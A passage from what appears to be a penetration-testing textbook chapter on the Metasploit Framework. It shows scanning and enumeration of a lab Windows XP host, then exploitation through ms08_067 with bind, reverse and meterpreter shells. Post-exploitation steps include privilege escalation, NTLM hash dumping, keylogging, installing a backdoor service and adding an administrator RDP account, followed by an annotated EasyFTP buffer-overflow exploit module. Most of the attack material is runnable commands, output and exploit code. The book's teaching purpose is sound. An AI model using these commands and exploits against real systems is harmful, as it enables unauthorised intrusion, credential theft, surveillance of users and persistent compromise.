If you encounter a database connection error, you can use the following two commands:

systemctl start postgresql
msfdb init

The database tracker will save the data obtained from the session for further use. To start an Nmap scan, enter the following:

msf>db_nmap -T Aggressive -sV -n -O -v 192.168.0.7 Starting Nmap 5.00 ( https：//nmap.org ) at 2010-11-11 22:34 UTC NSE: Loaded 3 scripts for scanning. Initiating ARP Ping Scan at 22:34 Scanning 192.168.0.7 [1 port] Completed ARP Ping Scan at 22:34, 0.00s elapsed (1 total hosts) Initiating SYN Stealth Scan at 22:34 Scanning 192.168.0.7 [1000 ports] Discovered open port 445/tcp on 192.168.0.7 Discovered open port 135/tcp on 192.168.0.7 Discovered open port 25/tcp on 192.168.0.7 Discovered open port 139/tcp on 192.168.0.7 Discovered open port 3389/tcp on 192.168.0.7 Discovered open port 80/tcp on 192.168.0.7 Discovered open port 443/tcp on 192.168.0.7 Discovered open port 21/tcp on 192.168.0.7 Discovered open port 1025/tcp on 192.168.0.7 Discovered open port 1433/tcp on 192.168.0.7 Completed SYN Stealth Scan at 22:34, 3.04s elapsed (1000 total ports) Initiating Service scan at 22:34
Scanning 10 services on 192.168.0.7
Completed Service scan at 22:35, 15.15s elapsed (10 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.7
...
PORT     STATE SERVICE       VERSION
21/tcpopen  ftp           Microsoft ftpd
25/tcpopen  smtp          Microsoft ESMTP 6.0.2600.2180
80/tcpopen  http          Microsoft IIS httpd 5.1
135/tcp  openmsrpc         Microsoft Windows RPC
139/tcp  opennetbios-ssn
443/tcp  open  https?
445/tcp  openmicrosoft-ds  Microsoft Windows XP microsoft-ds
1025/tcpopen  msrpc         Microsoft Windows RPC
1433/tcpopen  ms-sql-s      Microsoft SQL Server 2005 9.00.1399; RTM
3389/tcpopen  microsoft-rdp Microsoft Terminal Service
MAC Address: 00:0B:6B:68:19:91 (WistronNeweb)
Device type: general purpose
Running: Microsoft Windows 2000|XP|2003
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: custdesk; OS: Windows
...
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds
           Raw packets sent: 1026 (45.856KB) | Rcvd: 1024 (42.688KB)

At this point, we have successfully scanned the target and saved the results in the current database session. To list the discovered targets and services, you can use the db_hosts and db_services commands respectively. Additionally, if you have scanned the target separately using the Nmap program and saved the results in XML format, you can import these results into Metasploit using the db_import_nmap_xml command.

Scenario 2

In this example, we will illustrate some auxiliary features within the Metasploit framework. The key is to understand their importance in the vulnerability analysis process.

SMB Username Enumeration

This module will scan the target IP address, attempting to find usernames associated with Server Message Block (SMB). This service is used by applications to access file shares, printers, or communication between network devices. Using one of the Metasploit auxiliary scanners, we can determine possible usernames.

First, search for scanners in Metasploit by entering:

msf> search SMB 

Then, we can see the number of different scanners available for scanning open SMB services:

To use a scanner, enter the following:

msf> use auxiliary/scanner/smb/smb_enumusers 

Set the RHOSTS parameter to the network range, i.e., 192.168.0.1/24, by entering:

msf> set RHOSTS 192.168.0.1/24 

Then, enter:

msf> run 

The scan results indicate that there is an SMB service running with the username METASPLOITABLE:

This may indicate the presence of shares or other network services that could be attacked. The METASPLOIT username may also provide us a starting point when we start cracking user credentials and passwords.

VNC Blank Authentication Scanner

This module will scan a range of IP addresses for Virtual Network Computing (VNC) servers that are accessible without any authentication details:

msf> use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > show options
msf auxiliary(vnc_none_auth) > set RHOSTS 10.4.124.0/24
RHOSTS => 10.4.124.0/24
msf auxiliary(vnc_none_auth) > run
[*] 10.4.124.22:5900, VNC server protocol version : "RFB 004.000", 

not supported! [] 10.4.124.23:5900, VNC server protocol version : "RFB 004.000", not supported! [] 10.4.124.25:5900, VNC server protocol version : "RFB 004.000", not supported! [] Scanned 026 of 256 hosts (010% complete) [] 10.4.124.26:5900, VNC server protocol version : "RFB 004.000", not supported! [] 10.4.124.27:5900, VNC server security types supported : None, free access! [] 10.4.124.28:5900, VNC server security types supported : None, free access! [] 10.4.124.29:5900, VNC server protocol version : "RFB 004.000", not supported! ... [] 10.4.124.224:5900, VNC server protocol version : "RFB 004.000", not supported! [] 10.4.124.225:5900, VNC server protocol version : "RFB 004.000", not supported! [] 10.4.124.227:5900, VNC server security types supported : None, free access! [] 10.4.124.228:5900, VNC server protocol version : "RFB 004.000", not supported! [] 10.4.124.229:5900, VNC server protocol version : "RFB 004.000", not supported! [] Scanned 231 of 256 hosts (090% complete) [] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

Notice that we discovered some VNC servers that can be accessed without authentication. If authorization control is not enabled, this attack vector can pose a serious threat to system administrators and can easily invite unwanted visitors from the internet to your VNC server.

PostGRESQL Login

In previous chapters, during our Nmap scan of the Metasploitable OS, we discovered a PostgreSQL database service running on port 5432:

We can use the Metasploit auxiliary scanner to determine the database login credentials. First, we configure Metasploit to use the scanner by entering:

msf> use auxiliary/scanner/postgres/postgres_login

Next, we want to configure two options. The first option sets the scanner to continue scanning even if it finds a successful login. This allows us to scan multiple database instances and enumerate many usernames and passwords. We configure this by entering:

msf> set STOP_ON_SUCCESS true 

Secondly, we set the host to scan. The scanner will take a CIDR range or a single IP address. In this case, we will point the scanner to the Metasploitable OS at 192.168.0.30, as we identified an active instance at that IP address during our Nmap scan. We set this by entering:

msf> set RHOSTS 192.168.0.30

Then we run the exploit. When we examine the output, we can see that the username and password for the database have been found:

Database security is critical to an organization because databases often contain confidential information. Scanners such as PostgreSQL allow us to test the security around an organization's core confidential information in an efficient manner.

Scenario 3

Now we will explore some common payloads (Bind, Reverse, and Meterpreter) and discuss their functionality from an exploitation perspective. This exercise will give you an idea of when and how to use a specific payload.

Bind Shell

A bind shell is a remote shell connection that provides access to the target system after successful exploitation and execution of shellcode that sets up a bind port listener. This opens a channel for the attacker to connect back to the compromised machine using tools such as Netcat on the bind shell port, thereby tunneling standard input (stdin) and standard output (stdout) over the TCP connection. The way this works is similar to a Telnet client establishing a connection to a Telnet server, and it is suitable for environments where the attacker is behind Network Address Translation (NAT) or a firewall and cannot be directly contacted by the compromised host.

The following are the commands to start the exploitation and set up a bind shell:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:41289 ->

192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32> 

Thus, we have analyzed that Metasploit also automates the process of connecting to a bind shell using the integrated multi-payload handler. When writing your own exploit and using bind shellcode, tools like Netcat can come in handy, which requires a third-party handler to establish a connection to the compromised host. You can read about practical uses of Netcat in various network security operations at en.wikipedia.org/wiki/Netcat.

Reverse Shell

A reverse shell is the complete opposite of a bind shell. Instead of binding a port on the target system and waiting for a connection from the attacker's machine, it simply connects back to the attacker's IP and port and spawns a shell. A notable feature of a reverse shell is that it takes into account that the target may be behind a NAT or firewall, which blocks public access to its system resources.

The following are the commands to start the exploitation and set up a reverse shell:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 ->

192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32> 

You can clearly distinguish a reverse shell from a bind shell by the attacker's IP. In a reverse shell configuration, we must provide the attacker's IP (e.g., LHOST 192.168.0.3), whereas in a bind shell it is not required.

What is the difference between an inline and a staged payload? An inline payload is a single self-contained shellcode that will be executed in a single exploit instance, while a staged payload creates a communication channel between the attacker and victim machines to read the remaining staged shellcode to perform a specific task. Choosing a staged payload is a common practice because they are significantly smaller than inline payloads.

Meterpreters

The meterpreter is an advanced, stealthy, multifaceted, and dynamically extensible payload that operates by injecting a reflective DLL into target memory. Scripts and plugins can be loaded dynamically at runtime to extend post-exploitation activities. These include privilege escalation, dumping system accounts, keylogging, persistent backdoor services, and enabling remote desktop. Furthermore, the entire meterpreter shell communication is encrypted by default.

The following are the commands to start the exploitation and set up the meterpreter payload:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD 

windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options ... msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3 LHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.3:4444 ->

192.168.0.7:1029) at Sun Nov 14 02:44:26 +0000 2010 meterpreter> help ...

As you can see, we have successfully obtained a meterpreter shell. By typing help, we will be able to see various commands available to us. Let's check our current privileges and escalate them to SYSTEM level using a meterpreter script called getsystem:

meterpreter>getuid
Server username: CUSTDESKsalesdept
meterpreter> use priv
meterpreter>getsystem -h
...

This will show the number of techniques to escalate our privileges. By using the default command getsystem without any options, it will try each technique against the target and stop immediately upon success:

meterpreter>getsystem
...got system (via technique 1).
meterpreter>getuid
Server username: NT AUTHORITYSYSTEM
meterpreter>sysinfo
Computer: CUSTDESK
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US 

If you choose to execute the -j -z exploit command, the exploit execution is pushed to the background and no interactive meterpreter shell will appear. However, if the session has been successfully established, you can use session -i ID to interact with a specific session, or get a list of active sessions by typing sessions -l to obtain the exact ID value.

Let's utilize the capabilities of the meterpreter shell and dump the current system accounts and passwords held by the target using the following command. These will be displayed in NTLM hash format and can be cracked using several tools and techniques with the following commands:

meterpreter> run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 71e52ce6b86e5da0c213566a1236f892...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
h
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d2cd5d550e14593b12787245127c866d:d3e35f657c924d0b31eb811d2d986df9:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8edf0d0db48cbf7b2835ec013cfb9c5:::
Momin Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
IUSR_MOMINDESK:1004:a751dcb6ea9323026eb8f7854da74a24:b0196523134dd9a21bf6b80e02744513:::
ASPNET:1005:ad785822109dd077027175f3382059fd:21ff86d627bcf380a5b1b6abe5d8e1dd:::
IWAM_MOMINDESK:1009:12a75a1d0cf47cd0c8e2f82a92190b42:c74966d83d519ba41e5196e00f94e113:::
h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77faac126fdd377b1693::: 

Now, let's take this activity further by using the keylogging feature of the meterpreter shell using the following command, which may reveal some useful data from our target:

meterpreter>getuid
Server username: NT AUTHORITYSYSTEM
meterpreter>ps
Process list
============

 PID   Name              Arch  Session  User                          

Path --- ---- ---- ------- ----

 0     [System Process]
 4     System            x86   0        NT AUTHORITYSYSTEM
 384   smss.exe          x86   0        NT AUTHORITYSYSTEM           

SystemRootSystem32smss.exe 488 csrss.exe x86 0 NT AUTHORITYSYSTEM
??C:WINDOWSsystem32csrss.exe 648 winlogon.exe x86 0 NT AUTHORITYSYSTEM
??C:WINDOWSsystem32winlogon.exe 692 services.exe x86 0 NT AUTHORITYSYSTEM
C:WINDOWSsystem32services.exe 704 lsass.exe x86 0 NT AUTHORITYSYSTEM
C:WINDOWSsystem32lsass.exe ... 148 alg.exe x86 0 NT AUTHORITYLOCAL SERVICE
C:WINDOWSSystem32alg.exe 3172 explorer.exe x86 0 CUSTDESKsalesdept C:WINDOWSExplorer.EXE 3236 reader_sl.exe x86 0 CUSTDESKsalesdept C:Program FilesAdobeReader 9.0ReaderReader_sl.exe

At this stage, we will migrate the meterpreter shell to the explorer.exe process (3172) to start logging the current user's activity on the system using the following command:

meterpreter> migrate 3172
[*] Migrating to 3172...
[*] Migration completed successfully.
meterpreter>getuid
Server username: CUSTDESKsalesdept
meterpreter>keyscan_start
Starting the keystroke sniffer... 

We have now started our keylogger and should wait for some time to get a block of captured data:

meterpreter>keyscan_dump
Dumping captured keystrokes...
<Return> www.yahoo.com <Return><Back> www.bbc.co.uk <Return>
meterpreter>keyscan_stop
Stopping the keystroke sniffer... 

As you can see, we have dumped the target's web browsing activity. Similarly, we could also capture credentials of all users logging into the system by migrating to the winlogon.exe process (648).

You have exploited and gained access to the target system, but now wish to maintain this access, even if the exploited service or application is patched at a later stage. This type of activity is often referred to as a backdoor service. Note that the backdoor service provided by the meterpreter shell does not require authentication before accessing a specific network port on the target system. This could allow some uninvited guests to access your target and pose a significant risk. As part of penetration testing rules, this type of activity is generally not allowed. Therefore, we strongly recommend keeping backdoor services away from official penetration testing environments. You should also ensure that this is explicitly allowed during the scope and rules determination phase:

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.3:4444 ->

192.168.0.7:1032) at Tue Nov 16 19:21:39 +0000 2010 meterpreter>ps ... 292 alg.exe x86 0 NT AUTHORITYLOCAL SERVICE
C:WINDOWSSystem32alg.exe 1840 csrss.exe x86 2 NT AUTHORITYSYSTEM
??C:WINDOWSsystem32csrss.exe 528 winlogon.exe x86 2 NT AUTHORITYSYSTEM
??C:WINDOWSsystem32winlogon.exe 240 rdpclip.exe x86 0 CUSTDESKMomin Desktop
C:WINDOWSsystem32rdpclip.exe 1060 userinit.exe x86 0 CUSTDESKMomin Desktop
C:WINDOWSsystem32userinit.exe 1544 explorer.exe x86 0 CUSTDESKMomin Desktop
C:WINDOWSExplorer.EXE ... meterpreter> migrate 1544 [] Migrating to 1544... [] Migration completed successfully. meterpreter> run metsvc -h ... meterpreter> run metsvc [] Creating a meterpreter service on port 31337 [] Creating a temporary installation directory C:DOCUME1MOMIND1LOCALS~1TempoNyLOPeS... [] >> Uploading metsrv.dll... [] >> Uploading metsvc-server.exe... [] >> Uploading metsvc.exe... [] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed.

Thus, we have ultimately started a backdoor service on our target. We will close the current meterpreter session and interact with our backdoor service using multi/handler with the windows/metsvc_bind_tcp payload:

meterpreter> exit

[] Meterpreter session 1 closed. Reason: User exit msf exploit(ms08_067_netapi) > back msf> use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.0.7 RHOST => 192.168.0.7 msf exploit(handler) > exploit [] Starting the payload handler... [] Started bind handler [] Meterpreter session 2 opened (192.168.0.3:37251 -> 192.168.0.7:31337) at Tue Nov 16 20:02:05 +0000 2010 meterpreter>getuid Server username: NT AUTHORITYSYSTEM

Let's use another useful meterpreter script getgui to enable Remote Desktop access for our target. The following exercise will create a new user account on the target and enable the Remote Desktop service if it was previously disabled:

meterpreter> run getgui -u btuser -p btpass
[*] Windows Remote Desktop Configuration Meterpreter Script by 

Darkoperator [] Carlos Perez carlos_perez@darkoperator.com [] Language set by user to: 'en_EN' [] Setting user account for logon [] Adding User: btuser with Password: btpass [] Adding User: btuser to local group 'Remote Desktop Users' [] Adding User: btuser to local group 'Administrators' [] You can now login with the created user [] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20101116.3447.rc

Now, we can log in to our target system using the rdesktop program by typing the following command in another terminal:

# rdesktop 192.168.0.7:3389 

Note, if you already have a cracked password for any existing user on the target machine, you can simply execute the run getgui -e command to enable remote desktop service instead of adding a new user. Also, do not forget to clean up your tracks on the system by executing the getgui/clean_up script referenced at the end of the previous output.

How can I extend my attack scope by deeply accessing a target network that is not accessible from outside? Metasploit provides the ability to view and add new routes to target networks using the route add targetSubnet targetSubnetMask Session Id command (e.g., route add 10.2.4.0 255.255.255.0 1). Here, the Session Id parameter points to the existing meterpreter session (gateway), and the targetSubnet parameter is another network address (or dual-homed ethernet network address) located beyond our compromised target. Once you set Metasploit to route all traffic through the compromised host session, we are ready to further penetrate networks that are normally not routable from our side. This is often referred to as pivoting or footholding.

Writing an Exploit Module

Developing exploits is one of the most interesting aspects of the Metasploit framework. In this section, we will briefly discuss the core issues around exploit development and explain its key skeleton through a live example taken from the existing framework database. However, it is important to have a good command of the Ruby programming language before attempting to write your own exploit modules. On the other hand, intermediate reverse engineering skills and practical knowledge of vulnerability discovery tools (such as fuzzers and debuggers) provide an open map for exploit construction. This section serves only as an introduction to the topic, not a complete guide.

For our example, we have chosen a vulnerability (EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow), which will provide a basic view of the buffer overflow vulnerability in the Easy FTP Server application. You can port this module to similar vulnerabilities found in other FTP server applications and effectively utilize your time. The exploit code is located at /usr/share/metasploit-framework/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb:

##
# $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $
## 

The above code is a basic header representing the filename, revision number, and date/time value of the vulnerability:

##
# This file is part of the Metasploit Framework and may be subject 

to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http：//metasploit.com/framework/ ## require 'msf/core'

The MSF core library needs to be initialized at the start of the exploit:

class Metasploit3 <Msf::Exploit::Remote 

In the code above, the Exploit mixin/ class provides various options and methods for remote TCP connections, such as RHOST, RPORT, Connect(), Disconnect(), and SSL(). The following code assigns a rank to the vulnerability based on its frequent demand and usage:

Rank = GreatRanking 

In the following code, the Ftp mixin/ class establishes a connection with the FTP server:

include Msf::Exploit::Remote::Ftp 

The following code provides general information about the vulnerability and points to known references:

def initialize(info = {}) 
super(update_info(info, 
      'Name'           => 'EasyFTP Server <= 1.7.0.11 MKD Command 

Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow.

        NOTE: EasyFTP allows anonymous access by default. However, 

in order to access the 'MKD' command, you must have access to an account that can create directories.

        After version 1.7.0.12, this package was renamed 

"UplusFtp".

        This exploit utilizes a small piece of code that I've 

referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information. }, 'Author' => [ 'x90c', # original version 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9935 $', 'References' => [ [ 'OSVDB', '62134' ], [ 'URL', 'http：//www.exploit-db.com/exploits/12044/' ], [ 'URL', 'http：//www.exploit-db.com/exploits/14399/' ] ],

The following code instructs the payload to clean up after itself upon completion of execution:

 'DefaultOptions' => 
        { 
          'EXITFUNC' => 'thread' 

The following code snippet defines 512 bytes of space for the shellcode, lists bad characters that should terminate our payload delivery, and disables NOP padding:

 }, 
      'Privileged'     => false, 
      'Payload'        => 
        { 
          'Space'    => 512, 
          'BadChars' => "x00x0ax0dx2fx5c", 
          'DisableNops' => true 
        }, 

The following code snippet provides information about the target platform and defines vulnerable targets (0 through 9), listing different versions of Easy FTP Server (1.7.0.2 to 1.7.0.11), each with a unique return address based on the application binary (ftpbasicsvr.exe). Additionally, the vulnerability disclosure date is added, and the default target is set to 0 (v1.7.0.2):

 'Platform'       => 'win', 
      'Targets'        => 
        [ 
[ 'Windows Universal - v1.7.0.2',   { 'Ret' =>
          0x004041ec } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.3',   { 'Ret' =>
          0x004041ec } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.4',   { 'Ret' =>
          0x004041dc } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.5',   { 'Ret' =>
          0x004041a1 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.6',   { 'Ret' =>
          0x004041a1 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.7',   { 'Ret' =>
          0x004041a1 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.8',   { 'Ret' =>
          0x00404481 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.9',   { 'Ret' =>
          0x00404441 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.10',  { 'Ret' =>
          0x00404411 } ], # call ebp - from ftpbasicsvr.exe 
[ 'Windows Universal - v1.7.0.11',  { 'Ret' =>
          0x00404411 } ], # call ebp - from ftpbasicsvr.exe 
        ], 
      'DisclosureDate' => 'Apr 04 2010', 
      'DefaultTarget' => 0)) 

In the following code, the check() function determines if the target is vulnerable:

end 

def check 
connect 
disconnect 

if (banner =~ /BigFoolCat/) 
return Exploit::CheckCode::Vulnerable 
end 
return Exploit::CheckCode::Safe 
end 

The following code defines a function to generate NOP slides to aid in IDS/IPS/AV evasion. Some consider NOP slides a quick and dirty solution to this problem and argue that they should not be used unless there is a particularly good reason. For simplicity, in the example of writing a module, we kept the function in the code:

def make_nops(num); "C" * num; end 

The following process fixes a return address from which the payload can be executed. Technically, it solves the issue of stack addressing:

def exploit 
connect_login 

    # NOTE: 
    # This exploit jumps to ebp, which happens to point at a 
    partial version of 
    # the 'buf' string in memory. The fixRet below fixes up the 
    code stored on the 
    # stack and then jumps there to execute the payload. The value 
    in esp is used 
    # with an offset for the fixup. 
fixRet_asm = %q{ 
mov edi, esp 
sub edi, 0xfffffe10 
mov [edi], 0xfeedfed5 
add edi, 0xffffff14 
jmp edi 
    } 
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, 
fixRet_asm).encode_string 

buf = '' 

Initially, the exploit buffer contains the encoded return address and randomized NOP instructions:

print_status("Prepending fixRet...") 
buf<<fixRet 
buf<<make_nops(0x20 - buf.length)

The following code dynamically adds a generated shellcode to our exploit at runtime:

print_status("Adding the payload...") 
buf<<payload.encoded 

The following code fixes the stack data and short jumps to the return address where our shellcode buffer is stored:

 # Patch the original stack data into the fixer stub 
buf[10, 4] = buf[268, 4] 

print_status("Overwriting part of the payload with target 
    address...") 
buf[268,4] = [target.ret].pack('V') # put return address @ 268 
    bytes 

Finally, using the previous code, we use the vulnerable MKD FTP post-authentication command to send our final buffer to a specific target. Since the MKD command in the Easy FTP server is vulnerable to a stack-based buffer overflow, the buf command will overflow the target stack and exploit the target system by executing our payload:

print_status("Sending exploit buffer...") 
send_cmd( ['MKD', buf] , false) 

Close your connection with the following code:

handler 
disconnect 
end 

end 

Metasploit is equipped with useful tools, such as msfpescan for Win32 and msfelfscan for Linux systems, which may assist you in finding a return address for a specific target. For example, to find a sustainable return address from an application file of your choice, type # msfpescan -p targetapp.ext.

Summary

In this chapter, we pointed out several key areas required for target exploitation. First, we outlined weakness research, highlighting the need for penetration testers to have the necessary knowledge and skills, which in turn impacts weakness assessment. Then, we provided a list of online repositories from which you can obtain many publicly disclosed vulnerabilities and exploit code. In the final part, we demonstrated the practical use of an advanced exploit toolkit called the Metasploit Framework. The exercises provided are purely intended to explore and understand the target acquisition process through tactical exploitation methods. Additionally, we explained insights into exploit development by analyzing each step of an example exploit code within the framework, to help you understand the basic skeleton and construction strategy.

In the next chapter, we will discuss the process of privilege escalation and maintaining access using various tools and techniques, and how it can be beneficial after gaining a target.